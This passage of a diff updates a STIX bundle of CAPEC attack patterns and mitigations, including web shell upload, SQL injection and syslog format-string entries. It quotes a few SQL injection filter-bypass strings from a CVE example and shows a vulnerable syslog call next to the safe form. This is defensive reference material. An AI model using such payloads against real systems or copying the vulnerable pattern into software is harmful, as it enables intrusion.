"coa-648-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using whitelisting tools.", "type": "course-of-action", - "id": "course-of-action--91b2d399-8d98-47e9-9ecc-b307600e2aae" + "id": "course-of-action--04f7d772-c475-4fa9-b2b8-2b057368ea23" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--294e8c04-9ca7-4416-b7a1-141c955e7cff", - "source_ref": "course-of-action--91b2d399-8d98-47e9-9ecc-b307600e2aae", + "id": "relationship--c3f43923-aaf4-49f3-9671-2870eb851f3b", + "source_ref": "course-of-action--04f7d772-c475-4fa9-b2b8-2b057368ea23", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4bc32f7f-0af6-4d1e-93f7-af427c4593cc" + "target_ref": "attack-pattern--8f1bcb61-cdf4-41ff-a82a-df537363a9a5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-648-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "While screen capture is a legitimate and practical function, certain situations and context may require the disabling of this feature.", "type": "course-of-action", - "id": "course-of-action--2280f357-f194-41e6-bb15-9d41722da854" + "id": "course-of-action--cea57129-2096-4707-a328-617470bd4c96" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--811f2b64-5300-4107-8c9e-de6056e74598", - "source_ref": "course-of-action--2280f357-f194-41e6-bb15-9d41722da854", + "id": "relationship--ffdbbef1-9cc0-4d00-8cdb-0e437e9e149e", + "source_ref": "course-of-action--cea57129-2096-4707-a328-617470bd4c96", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4bc32f7f-0af6-4d1e-93f7-af427c4593cc" + "target_ref": "attack-pattern--8f1bcb61-cdf4-41ff-a82a-df537363a9a5" }, { "name": "Adding a Space to a File Extension", "description": "An adversary adds a space character to the end of a file extension and takes advantage of an application that does not properly neutralize trailing special elements in file names. This extra space, which can be difficult for a user to notice, affects which default application is used to operate on the file and can be leveraged by the adversary to control execution.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-05-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -39974,40 +40668,41 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--621299ce-9418-4a33-a87c-d21690a11138" + "id": "attack-pattern--62ee09d6-0723-472f-9173-8bd1092cc077" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-649-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "File extensions should be checked to see if non-visible characters are being included.", "type": "course-of-action", - "id": "course-of-action--0c4a8c29-fdd1-4021-911e-46137689c662" + "id": "course-of-action--4d92cf6d-e95c-427c-89c7-31a58f807f99" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e2e80f1c-0f62-4e95-9657-b5eeb2b38bc7", - "source_ref": "course-of-action--0c4a8c29-fdd1-4021-911e-46137689c662", + "id": "relationship--b0af97af-2ac2-4d5a-8fb1-3cfaeedc6ee2", + "source_ref": "course-of-action--4d92cf6d-e95c-427c-89c7-31a58f807f99", "relationship_type": "mitigates", - "target_ref": "attack-pattern--621299ce-9418-4a33-a87c-d21690a11138" + "target_ref": "attack-pattern--62ee09d6-0723-472f-9173-8bd1092cc077" }, { "name": "Sniff Application Code", "description": "An adversary passively sniffs network communications and captures application code bound for an authorized client. Once obtained, they can use it as-is, or through reverse-engineering glean sensitive information or exploit the trust relationship between the client and server. Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", @@ -40074,90 +40769,91 @@ "Plain code, such as applets or JavaScript, is also part of the executing application. If such code is transmitted unprotected, the attacker can capture the code and possibly reverse engineer it to gain sensitive information, such as encryption keys, validation algorithms and such." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--611ef0c1-bc73-4522-b702-0076a4ad0caf" + "id": "attack-pattern--fafd41d0-eecf-4518-8f23-4145219d48de" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-65-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Encrypt all communication between the client and server.", "type": "course-of-action", - "id": "course-of-action--ff277731-face-48c5-ba80-b574b490d6f0" + "id": "course-of-action--c75dfa6d-afe9-465c-a6c3-f907a6000417" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--542f3c8f-4145-4259-a7a9-e47d31957d21", - "source_ref": "course-of-action--ff277731-face-48c5-ba80-b574b490d6f0", + "id": "relationship--373b622f-b2bd-4d74-8ae4-3adff948fdab", + "source_ref": "course-of-action--c75dfa6d-afe9-465c-a6c3-f907a6000417", "relationship_type": "mitigates", - "target_ref": "attack-pattern--611ef0c1-bc73-4522-b702-0076a4ad0caf" + "target_ref": "attack-pattern--fafd41d0-eecf-4518-8f23-4145219d48de" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-65-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Use SSL, SSH, SCP.", "type": "course-of-action", - "id": "course-of-action--d1c08510-eaca-46eb-89ed-43adf0181caa" + "id": "course-of-action--430d5b07-c34b-41e6-8ca6-ba6b15e2d7bc" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--185bf048-743a-41ea-bfe6-fd5456deaafe", - "source_ref": "course-of-action--d1c08510-eaca-46eb-89ed-43adf0181caa", + "id": "relationship--3623d044-a85f-4909-8331-8a31b37f675f", + "source_ref": "course-of-action--430d5b07-c34b-41e6-8ca6-ba6b15e2d7bc", "relationship_type": "mitigates", - "target_ref": "attack-pattern--611ef0c1-bc73-4522-b702-0076a4ad0caf" + "target_ref": "attack-pattern--fafd41d0-eecf-4518-8f23-4145219d48de" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-65-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Operation: Use \"ifconfig/ipconfig\" or other tools to detect the sniffer installed in the network.", "type": "course-of-action", - "id": "course-of-action--6c0650e3-11c6-4018-a7ba-e3bb8af6c574" + "id": "course-of-action--b34670c6-335f-4603-b4a0-bffa0c404c7f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--22fef939-eaf1-4256-bddc-2692cb843566", - "source_ref": "course-of-action--6c0650e3-11c6-4018-a7ba-e3bb8af6c574", + "id": "relationship--38d069d4-4832-41a5-8156-70a3596620bf", + "source_ref": "course-of-action--b34670c6-335f-4603-b4a0-bffa0c404c7f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--611ef0c1-bc73-4522-b702-0076a4ad0caf" + "target_ref": "attack-pattern--fafd41d0-eecf-4518-8f23-4145219d48de" }, { "name": "Upload a Web Shell to a Web Server", "description": "By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a \"gateway\" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-05-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -40203,40 +40899,41 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ad0bb273-8243-49ba-87d5-99afed8d6545" + "id": "attack-pattern--1fd71a54-9d48-4adb-805d-11e5498f6242" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-650-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "\n Make sure your web server is up-to-date with all patches to protect against known vulnerabilities.\n Insure that the file permissions in directories on the web server from which files can be execute is set to the \"least privilege\" settings, and that those directories contents is controlled by a whitelist.\n ", "type": "course-of-action", - "id": "course-of-action--53c6d4c3-a547-43e9-b317-31d4c6b7f355" + "id": "course-of-action--501aa08c-8325-4076-945a-95272170d1b9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--248e20d8-483a-4357-9683-2cf7409dbf23", - "source_ref": "course-of-action--53c6d4c3-a547-43e9-b317-31d4c6b7f355", + "id": "relationship--b0bb3dd2-e5e1-4b91-ace3-c6db22d9d1a2", + "source_ref": "course-of-action--501aa08c-8325-4076-945a-95272170d1b9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ad0bb273-8243-49ba-87d5-99afed8d6545" + "target_ref": "attack-pattern--1fd71a54-9d48-4adb-805d-11e5498f6242" }, { "name": "Eavesdropping", "description": "An adversary intercepts a form of communication (e.g. text, audio, video) by way of software (e.g., microphone and audio recording application), hardware (e.g., recording equipment), or physical means (e.g., physical proximity). The goal of eavesdropping is typically to gain unauthorized access to sensitive information about the target for financial, personal, political, or other gains. Eavesdropping is different from a sniffing attack as it does not take place on a network-based communication channel (e.g., IP traffic). Instead, it entails listening in on the raw audio source of a conversation between two or more parties.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", @@ -40266,90 +40963,91 @@ }, "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--b96003e9-7554-40e2-a5cf-0a0d4d485948" + "id": "attack-pattern--7b66655f-87f3-4eaa-8f61-ee8e2f23f6b9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "name": "coa-651-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Be mindful of your surroundings when discussing sensitive information in public areas.", "type": "course-of-action", - "id": "course-of-action--25f98412-0775-483f-8a38-4ffd75b291d1" + "id": "course-of-action--484680dd-30ae-434b-9cd3-1f30cf495f3b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--87eb831d-c6fa-4169-9c69-7667939d646b", - "source_ref": "course-of-action--25f98412-0775-483f-8a38-4ffd75b291d1", + "id": "relationship--83ee75c4-f664-4d85-a75d-c147df341d98", + "source_ref": "course-of-action--484680dd-30ae-434b-9cd3-1f30cf495f3b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b96003e9-7554-40e2-a5cf-0a0d4d485948" + "target_ref": "attack-pattern--7b66655f-87f3-4eaa-8f61-ee8e2f23f6b9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "name": "coa-651-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implement proper software restriction policies to only allow authorized software on your environment. Use of anti-virus and other security monitoring and detecting tools can aid in this too. Closely monitor installed software for unusual behavior or activity, and implement patches as soon as they become available.", "type": "course-of-action", - "id": "course-of-action--00426c48-3961-431d-acba-e8760ccabc25" + "id": "course-of-action--a53c5e79-8db2-4393-b2e7-ea807fdde618" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d45d62da-8798-4189-bb1b-677abe232950", - "source_ref": "course-of-action--00426c48-3961-431d-acba-e8760ccabc25", + "id": "relationship--e281db8d-4ac2-467b-a5f5-aae48f2fd6b8", + "source_ref": "course-of-action--a53c5e79-8db2-4393-b2e7-ea807fdde618", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b96003e9-7554-40e2-a5cf-0a0d4d485948" + "target_ref": "attack-pattern--7b66655f-87f3-4eaa-8f61-ee8e2f23f6b9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "name": "coa-651-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "If possible, physically disable the microphone on your machine if it is not needed.", "type": "course-of-action", - "id": "course-of-action--5d5aa6a3-8659-4d06-aa47-b674692da66b" + "id": "course-of-action--bb8ff861-9a05-4c4d-9add-18fe639752a8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--53e844b4-26a3-4641-9706-ccb408cd9b98", - "source_ref": "course-of-action--5d5aa6a3-8659-4d06-aa47-b674692da66b", + "id": "relationship--01b04b8e-b59e-4cc9-b84c-f2b5704d6bf6", + "source_ref": "course-of-action--bb8ff861-9a05-4c4d-9add-18fe639752a8", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b96003e9-7554-40e2-a5cf-0a0d4d485948" + "target_ref": "attack-pattern--7b66655f-87f3-4eaa-8f61-ee8e2f23f6b9" }, { "name": "SQL Injection", "description": "This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input. When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers' choice. SQL Injection enables an attacker to talk directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database. In order to successfully inject SQL and retrieve information from a database, an attacker:", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -40427,90 +41125,91 @@ "With PHP-Nuke versions 7.9 and earlier, an attacker can successfully access and modify data, including sensitive contents such as usernames and password hashes, and compromise the application through SQL Injection. The protection mechanism against SQL Injection employs a blacklist approach to input validation. However, because of improper blacklisting, it is possible to inject content such as \"foo'/**/UNION\" or \"foo UNION/**/\" to bypass validation and glean sensitive information from the database. See also: CVE-2006-5525" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--90100c90-8261-4042-b13e-c42c4ab9a914" + "id": "attack-pattern--3d863e50-08bf-40ac-9cb1-a847dd37cd0e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-66-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear.", "type": "course-of-action", - "id": "course-of-action--32e3e6b3-f588-4d30-8aea-e1457dec060b" + "id": "course-of-action--b8c7d2ba-edaa-44e3-b9a2-64c34bd02f28" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--405855fb-990d-485f-b027-050c78dc1760", - "source_ref": "course-of-action--32e3e6b3-f588-4d30-8aea-e1457dec060b", + "id": "relationship--eba54b7c-685e-4917-a4d8-2ad388f9d918", + "source_ref": "course-of-action--b8c7d2ba-edaa-44e3-b9a2-64c34bd02f28", "relationship_type": "mitigates", - "target_ref": "attack-pattern--90100c90-8261-4042-b13e-c42c4ab9a914" + "target_ref": "attack-pattern--3d863e50-08bf-40ac-9cb1-a847dd37cd0e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-66-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use of parameterized queries or stored procedures - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails. Note that SQL Injection is possible even in the presence of stored procedures if the eventual query is constructed dynamically.", "type": "course-of-action", - "id": "course-of-action--ac4b055f-d615-413e-a88e-dd867bf6e51f" + "id": "course-of-action--1e9eba5c-8854-484c-9658-e9a241568533" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3555fc44-f426-4e0f-b5ed-7796e4fc6b2e", - "source_ref": "course-of-action--ac4b055f-d615-413e-a88e-dd867bf6e51f", + "id": "relationship--99ab01a2-3d66-43bc-8f26-933c354de81b", + "source_ref": "course-of-action--1e9eba5c-8854-484c-9658-e9a241568533", "relationship_type": "mitigates", - "target_ref": "attack-pattern--90100c90-8261-4042-b13e-c42c4ab9a914" + "target_ref": "attack-pattern--3d863e50-08bf-40ac-9cb1-a847dd37cd0e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-66-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application.", "type": "course-of-action", - "id": "course-of-action--6f84cd30-2b82-4135-816d-792e356126ea" + "id": "course-of-action--0b8e6f93-072a-40f9-b438-9618b0494301" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--2bb66f36-65d5-475b-8b44-84a3c75dd543", - "source_ref": "course-of-action--6f84cd30-2b82-4135-816d-792e356126ea", + "id": "relationship--7ec0c832-fcae-437d-a36d-2c55aed229e0", + "source_ref": "course-of-action--0b8e6f93-072a-40f9-b438-9618b0494301", "relationship_type": "mitigates", - "target_ref": "attack-pattern--90100c90-8261-4042-b13e-c42c4ab9a914" + "target_ref": "attack-pattern--3d863e50-08bf-40ac-9cb1-a847dd37cd0e" }, { "name": "String Format Overflow in syslog()", "description": "This attack targets the format string vulnerabilities in the syslog() function. An attacker would typically inject malicious input in the format string parameter of the syslog function. This is a common problem, and many public vulnerabilities and associated exploits have been posted.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -40610,40 +41309,41 @@ "Format string vulnerability in TraceEvent function for ntop before 2.1 allows remote attackers to execute arbitrary code by causing format strings to be injected into calls to the syslog function, via (1) an HTTP GET request, (2) a user name in HTTP authentication, or (3) a password in HTTP authentication. See also: CVE-2002-0412" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--1946dd88-8924-4fb5-a3a4-a3c4d7b7114b" + "id": "attack-pattern--5376ae8c-a2da-4f87-941e-ccc030c8fdb1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-67-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "\n The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():\n syslog(LOG_ERR, \"%s\", cmdBuf);\n The following code shows a vulnerable usage of Syslog():\n syslog(LOG_ERR, cmdBuf);\n // the buffer cmdBuff is taking user supplied data.\n \n \n ", "type": "course-of-action", - "id": "course-of-action--1ec8cd6c-071b-4e66-b608-1866fc845d09" + "id": "course-of-action--7b9b22b1-1cfe-4dd8-9f3e-9cd9441f2f72" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--dcd531d6-63e8-4a07-9abe-da84439ceec4", - "source_ref": "course-of-action--1ec8cd6c-071b-4e66-b608-1866fc845d09", + "id": "relationship--dc195719-aaad-4810-9bd1-851dcc2aeb85", + "source_ref": "course-of-action--7b9b22b1-1cfe-4dd8-9f3e-9cd9441f2f72", "relationship_type": "mitigates", - "target_ref": 